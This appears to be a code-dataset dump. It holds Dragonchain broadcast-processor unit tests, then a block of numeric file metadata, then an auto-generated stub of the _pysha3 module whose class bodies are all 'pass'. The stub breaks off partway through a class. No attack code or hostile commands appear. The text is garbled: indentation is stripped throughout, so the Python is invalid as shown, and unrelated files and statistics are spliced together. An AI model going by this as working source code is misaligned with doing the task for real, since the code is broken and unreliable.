class BroadcastProcessorTests(unittest.IsolatedAsyncioTestCase):
def setUp(self):
importlib.reload(broadcast_processor)
broadcast_processor.BROADCAST = "true"
broadcast_processor.LEVEL = "1"
broadcast_processor._requirements = {
"l2": {"nodesRequired": 2},
"l3": {"nodesRequired": 3},
"l4": {"nodesRequired": 4},
"l5": {"nodesRequired": 5},
}
def test_setup_raises_error_when_not_level_1(self):
broadcast_processor.LEVEL = "2"
self.assertRaises(RuntimeError, broadcast_processor.setup)
def test_setup_raises_error_when_not_broadcasting(self):
broadcast_processor.BROADCAST = "false"
self.assertRaises(RuntimeError, broadcast_processor.setup)
@patch("dragonchain.broadcast_processor.broadcast_processor.dragonnet_config.DRAGONNET_CONFIG", 4)
def test_setup_sets_module_vars_correctly(self):
broadcast_processor.setup()
self.assertEqual(broadcast_processor._requirements, 4)
def test_needed_verifications_returns_correct_value_from_requirements(self):
self.assertEqual(broadcast_processor.needed_verifications(2), 2)
self.assertEqual(broadcast_processor.needed_verifications(3), 3)
self.assertEqual(broadcast_processor.needed_verifications(4), 4)
self.assertEqual(broadcast_processor.needed_verifications(5), 5)
def test_chain_id_from_matchmaking_claim_returns_correct(self):
fake_claim = {"validations": {"l2": {"test2": {}}, "l3": {"test3": {}}, "l4": {"test4": {}}, "l5": {"test5": {}}}}
self.assertEqual(broadcast_processor.chain_id_set_from_matchmaking_claim(fake_claim, 2), {"test2"})
self.assertEqual(broadcast_processor.chain_id_set_from_matchmaking_claim(fake_claim, 3), {"test3"})
self.assertEqual(broadcast_processor.chain_id_set_from_matchmaking_claim(fake_claim, 4), {"test4"})
self.assertEqual(broadcast_processor.chain_id_set_from_matchmaking_claim(fake_claim, 5), {"test5"})
def test_get_level_from_storage_location_returns_level_string(self):
level = broadcast_processor.get_level_from_storage_location("/BLOCK/something-l3-asdfsdf")
self.assertEqual(level, "3")
def test_get_level_from_storage_location_returns_none_when_fails(self):
self.assertIsNone(broadcast_processor.get_level_from_storage_location("/BLOCK/something-apples-asdfsdf"))
def test_notification_urls_returns_set(self):
urls = broadcast_processor.get_notification_urls("banana")
self.assertEqual(type(urls), set)
@patch.dict("dragonchain.broadcast_processor.broadcast_processor.VERIFICATION_NOTIFICATION", {"all": ["url1"]})
def test_notification_urls_returns_values_from_env(self):
urls = broadcast_processor.get_notification_urls("all")
self.assertEqual(urls, {"url1"})
@patch(
"dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration",
return_value={"network": "bitcoin mainnet", "broadcastInterval": 1.23},
)
def test_set_l5_wait_time_success(self, mock_get_rego):
self.assertEqual(broadcast_processor.set_l5_wait_time("chainid"), 15228) # (600 * 6 * 3) + ((1.23 * 60) *60)
mock_get_rego.assert_called_once_with("chainid")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration", return_value={"fruit": "banana"})
def test_set_l5_wait_time_throws_exception(self, mock_get_rego):
self.assertEqual(broadcast_processor.set_l5_wait_time("chainid"), 43200) # hardcoded fallback value
mock_get_rego.assert_called_once_with("chainid")
@patch.dict("dragonchain.broadcast_processor.broadcast_processor._l5_wait_times", {"banana": 123})
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration")
def test_get_l5_wait_time_is_cached(self, mock_get_rego):
self.assertEqual(broadcast_processor.get_l5_wait_time("banana"), 123)
mock_get_rego.assert_not_called()
@patch.dict("dragonchain.broadcast_processor.broadcast_processor._l5_wait_times", {})
@patch(
"dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration",
return_value={"network": "bitcoin mainnet", "broadcastInterval": 1.23},
)
def test_get_l5_wait_time_not_cached(self, mock_get_rego):
self.assertEqual(broadcast_processor.get_l5_wait_time("chainid"), 15228)
mock_get_rego.assert_called_once_with("chainid")
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto")
def test_broadcast_futures_gets_broadcast_dto_for_block_id(self, patch_get_broadcast):
broadcast_processor.make_broadcast_futures(None, "id", 3, set())
patch_get_broadcast.assert_called_once_with(3, "id")
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto", return_value="dto")
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.create_task", return_value="task")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_dragonchain_address", return_value="addr")
@patch(
"dragonchain.broadcast_processor.broadcast_processor.authorization.generate_authenticated_request",
return_value=({"header": "thing"}, b"some data"),
)
def test_broadcast_futures_returns_set_of_futures_from_session_posts(
self, mock_gen_request, mock_get_address, mock_create_task, patch_get_broadcast
):
fake_session = MagicMock()
fake_session.post = MagicMock(return_value="session_request")
self.assertEqual(broadcast_processor.make_broadcast_futures(fake_session, "block_id", 2, {"chain_id"}), {"task"})
mock_get_address.assert_called_once_with("chain_id")
mock_create_task.assert_called_once_with("session_request")
mock_gen_request.assert_called_once_with("POST", "chain_id", "/v1/enqueue", "dto")
fake_session.post.assert_called_once_with(
url="addr/v1/enqueue",
data=b"some data",
headers={"header": "thing", "deadline": str(broadcast_processor.BROADCAST_RECEIPT_WAIT_TIME)},
timeout=broadcast_processor.HTTP_REQUEST_TIMEOUT,
)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.create_task", return_value="task")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_dragonchain_address", return_value="addr")
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto", return_value="dto")
@patch(
"dragonchain.broadcast_processor.broadcast_processor.authorization.generate_authenticated_request",
return_value=({"header": "thing"}, b"some data"),
)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_registration",
return_value={"network": "bitcoin mainnet", "broadcastInterval": 1.23},
)
def test_broadcast_futures_sets_deadline_header_for_l5(self, mock_get_rego, mock_gen_request, mock_get_address, mock_create_task, mock_dto):
fake_session = MagicMock()
fake_session.post = MagicMock(return_value="session_request")
broadcast_processor.make_broadcast_futures(fake_session, "block_id", 5, {"chain_id"})
fake_session.post.assert_called_once_with(
url="addr/v1/enqueue",
data=b"some data",
headers={"header": "thing", "deadline": "15228"},
timeout=broadcast_processor.HTTP_REQUEST_TIMEOUT,
)
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto", return_value="dto")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_dragonchain_address", return_value="addr")
@patch("dragonchain.broadcast_processor.broadcast_processor.authorization.generate_authenticated_request", side_effect=Exception)
def test_broadcast_futures_doesnt_return_future_for_exception_with_a_chain(self, mock_gen_req, mock_get_address, patch_get_broadcast):
fake_session = MagicMock()
fake_session.post = MagicMock(return_value="session_request")
self.assertEqual(broadcast_processor.make_broadcast_futures(fake_session, "block_id", 2, {"chain_id"}), set())
@patch("dragonchain.broadcast_processor.broadcast_processor.block_dao.get_broadcast_dto", side_effect=exceptions.NotEnoughVerifications)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.increment_storage_error_sync")
def test_broadcast_futures_returns_none_on_get_broadcast_dto_failure(self, mock_increment_error, patch_get_broadcast):
self.assertIsNone(broadcast_processor.make_broadcast_futures(None, "block_id", 2, {"chain_id"}))
mock_increment_error.assert_called_once_with("block_id", 2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async", return_value=[])
async def test_process_blocks_gets_blocks_for_broadcast(self, mock_get_blocks, mock_gather):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_get_blocks.assert_awaited_once()
@patch(
"dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check",
return_value={"metadata": {"dcId": "banana-dc-id"}},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim")
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 0)],
)
async def test_process_blocks_calls_matchmaking_for_claims(
self, mock_get_blocks, mock_gather, mock_get_block_level, mock_chain_id_set, mock_get_futures, mock_schedule_broadcast, mock_claim
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_claim.assert_called_once_with("block_id", broadcast_processor._requirements)
mock_chain_id_set.assert_called_once_with({"metadata": {"dcId": "banana-dc-id"}}, 2)
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check", side_effect=exceptions.InsufficientFunds)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.sleep")
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=None)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 0)],
)
async def test_process_blocks_sleeps_with_insufficient_funds(self, mock_get_blocks, mock_gather, mock_get_block_level, mock_sleep, mock_claim):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_sleep.assert_awaited_once_with(1800)
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.time.time", return_value=123)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value=None,
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 0)],
)
async def test_process_blocks_fires_requests_and_reschedules_for_new_block(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_time,
mock_claim,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_get_futures.assert_called_once_with(None, "block_id", 2, {"chain_id"})
mock_schedule_broadcast.assert_awaited_once_with("block_id", 123 + broadcast_processor.BROADCAST_RECEIPT_WAIT_TIME)
mock_gather.assert_called_once_with(return_exceptions=True)
mock_get_verifications.assert_not_called()
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures", return_value=None)
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 0)],
)
async def test_process_blocks_doesnt_reschedule_new_block_which_failed_had_no_futures(
self, mock_get_blocks, mock_gather, mock_get_block_level, mock_chain_id_set, mock_get_futures, mock_schedule_broadcast, mock_claim
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_get_futures.assert_called_once()
mock_schedule_broadcast.assert_not_called()
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.set_current_block_level_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=0)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_promotes_block_with_enough_verifications(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_needed_verifications,
mock_set_block_level,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_set_block_level.assert_awaited_once_with("block_id", 3)
mock_schedule_broadcast.assert_awaited_once_with("block_id")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.remove_block_from_broadcast_system_async",
return_value=asyncio.Future(),
)
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=0)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=5)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_removes_l5_block_with_enough_verifications(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_get_verifications,
mock_needed_verifications,
mock_remove_block,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
mock_remove_block.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_remove_block.assert_called_once_with("block_id")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.overwrite_no_response_node")
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=3)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_updates_matchmaking_claim_for_new_chain_verification(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_needed_verifications,
mock_no_response_node,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_no_response_node.assert_called_once_with("block_id", 2, "chain_id")
@patch(
"dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check",
return_value={"metadata": {"dcId": "banana-dc-id"}},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.overwrite_no_response_node", return_value={"verification"})
@patch("dragonchain.broadcast_processor.broadcast_processor.time.time", return_value=123)
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=3)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures")
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_makes_broadcast_and_reschedules_block_when_sending_new_requests(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_needed_verifications,
mock_time,
mock_no_response_node,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_get_futures.assert_called_once_with(None, "block_id", 2, {"chain_id"})
mock_schedule_broadcast.assert_awaited_once_with("block_id", 123 + broadcast_processor.BROADCAST_RECEIPT_WAIT_TIME)
mock_gather.assert_called_once_with(return_exceptions=True)
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.get_or_create_claim_check")
@patch("dragonchain.broadcast_processor.broadcast_processor.matchmaking.overwrite_no_response_node", return_value={"verification"})
@patch("dragonchain.broadcast_processor.broadcast_processor.needed_verifications", return_value=3)
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_receieved_verifications_for_block_and_level_async",
return_value={"verification"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.schedule_block_for_broadcast_async")
@patch("dragonchain.broadcast_processor.broadcast_processor.make_broadcast_futures", return_value=None)
@patch("dragonchain.broadcast_processor.broadcast_processor.chain_id_set_from_matchmaking_claim", return_value={"chain_id"})
@patch("dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_current_block_level_async", return_value=2)
@patch("dragonchain.broadcast_processor.broadcast_processor.asyncio.gather", return_value=asyncio.Future())
@patch(
"dragonchain.broadcast_processor.broadcast_processor.broadcast_functions.get_blocks_to_process_for_broadcast_async",
return_value=[("block_id", 1)],
)
async def test_process_blocks_doesnt_reschedule_existing_block_which_failed_had_no_futures(
self,
mock_get_blocks,
mock_gather,
mock_get_block_level,
mock_chain_id_set,
mock_get_futures,
mock_schedule_broadcast,
mock_get_verifications,
mock_needed_verifications,
mock_no_response_node,
mock_claim_check,
):
mock_gather.return_value.set_result(None)
await broadcast_processor.process_blocks_for_broadcast(None)
mock_get_futures.assert_called_once()
mock_schedule_broadcast.assert_not_called()
@patch(
"dragonchain.broadcast_processor.broadcast_functions.get_notification_verifications_for_broadcast_async",
return_value={"BLOCK/banana-l2-whatever"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.sign", return_value="my-signature")
@patch("dragonchain.broadcast_processor.broadcast_processor.storage.get", return_value=b"location-object-bytes")
@patch("dragonchain.broadcast_processor.broadcast_processor.keys.get_public_id", return_value="my-public-id")
@patch("dragonchain.broadcast_processor.broadcast_functions.redis.srem_async", return_value="OK")
async def test_process_verification_notification_calls_configured_url(
self, srem_mock, public_id_mock, storage_get_mock, sign_mock, get_location_mock
):
broadcast_processor.VERIFICATION_NOTIFICATION = {"all": ["url1"]}
fake_session = AsyncMock(post=AsyncMock())
await broadcast_processor.process_verification_notifications(fake_session)
fake_session.post.assert_awaited_once_with(
data=b"location-object-bytes",
headers={"Content-Type": "application/json", "dragonchainId": "my-public-id", "signature": "my-signature"},
timeout=30,
url="url1",
)
srem_mock.assert_awaited_once_with("broadcast:notifications", "BLOCK/banana-l2-whatever")
@patch(
"dragonchain.broadcast_processor.broadcast_functions.get_notification_verifications_for_broadcast_async",
return_value={"BLOCK/banana-l2-whatever"},
)
@patch("dragonchain.broadcast_processor.broadcast_processor.sign", return_value="my-signature")
@patch("dragonchain.broadcast_processor.broadcast_processor.storage.get", return_value=b"location-object-bytes")
@patch("dragonchain.broadcast_processor.broadcast_processor.keys.get_public_id", return_value="my-public-id")
@patch("dragonchain.broadcast_processor.broadcast_functions.redis.srem_async", return_value="OK")
async def test_process_verification_notification_removes_from_set_when_fail(
self, srem_mock, public_id_mock, storage_get_mock, sign_mock, get_location_mock
):
broadcast_processor.VERIFICATION_NOTIFICATION = {"all": ["url1"]}
fake_session = AsyncMock(post=AsyncMock(side_effect=Exception("boom")))
await broadcast_processor.process_verification_notifications(fake_session)
fake_session.post.assert_called_once_with(
data=b"location-object-bytes",
headers={"Content-Type": "application/json", "dragonchainId": "my-public-id", "signature": "my-signature"},
timeout=30,
url="url1",
)
srem_mock.assert_awaited_once_with("broadcast:notifications", "BLOCK/banana-l2-whatever")
| 59.722222
| 147
| 0.776262
| 3,407
| 29,025
| 6.158791
| 0.088641
| 0.235905
| 0.19816
| 0.204642
| 0.847972
| 0.834962
| 0.804079
| 0.782205
| 0.774484
| 0.75504
| 0
| 0.007105
| 0.132024
| 29,025
| 485
| 148
| 59.845361
| 0.825785
| 0.038381
| 0
| 0.650575
| 0
| 0
| 0.411065
| 0.365423
| 0
| 0
| 0
| 0
| 0.128736
| 1
| 0.043678
| false
| 0
| 0.018391
| 0
| 0.064368
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3bd156150c8368a9a7850e6bb5b56aa237a4a6c2
| 17,158
|
py
|
Python
|
_pysha3.py
|
ReardenMetals/keygen-core
|
6ddd83b5646d2fd31c0b77a96ff01be3d213e50a
|
[
"MIT"
] | 1
|
2021-08-12T15:35:10.000Z
|
2021-08-12T15:35:10.000Z
|
_pysha3.py
|
ReardenMetals/keygen-core
|
6ddd83b5646d2fd31c0b77a96ff01be3d213e50a
|
[
"MIT"
] | null | null | null |
_pysha3.py
|
ReardenMetals/keygen-core
|
6ddd83b5646d2fd31c0b77a96ff01be3d213e50a
|
[
"MIT"
] | 2
|
2021-08-12T15:35:11.000Z
|
2022-02-01T19:14:01.000Z
|
# encoding: utf-8
# module _pysha3
# from /Users/bodayalfaro/Developer/Projects/ReardenMetals/KeyGen/csc-manager/venv/lib/python3.8/site-packages/_pysha3.cpython-38-darwin.so
# by generator 1.147
# no doc
# no imports
# Variables with simple values
implementation = 'generic 64-bit optimized implementation (lane complementing, all rounds unrolled)'
keccakopt = 64
# no functions
# classes
class keccak_224(object):
"""
keccak_224([string]) -> Keccak object
Return a new Keccak hash object with a hashbit length of 28 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class keccak_256(object):
"""
keccak_256([string]) -> Keccak object
Return a new Keccak hash object with a hashbit length of 32 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class keccak_384(object):
"""
keccak_384([string]) -> Keccak object
Return a new Keccak hash object with a hashbit length of 48 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class keccak_512(object):
"""
keccak_512([string]) -> Keccak object
Return a new Keccak hash object with a hashbit length of 64 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class sha3_224(object):
""" Return a new SHA3 hash object with a hashbit length of 28 bytes. """
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
digest_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_capacity_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_rate_bits = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_suffix = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
class sha3_256(object):
"""
sha3_256([string]) -> SHA3 object
Return a new SHA3 hash object with a hashbit length of 32 bytes.
"""
def copy(self, *args, **kwargs): # real signature unknown
""" Return a copy of the hash object. """
pass
def digest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of binary data. """
pass
def hexdigest(self, *args, **kwargs): # real signature unknown
""" Return the digest value as a string of hexadecimal digits. """
pass
def update(self, *args, **kwargs): # real signature unknown
""" Update this hash object's state with the provided string. """
pass
def __init__(self, string=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
block_size = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
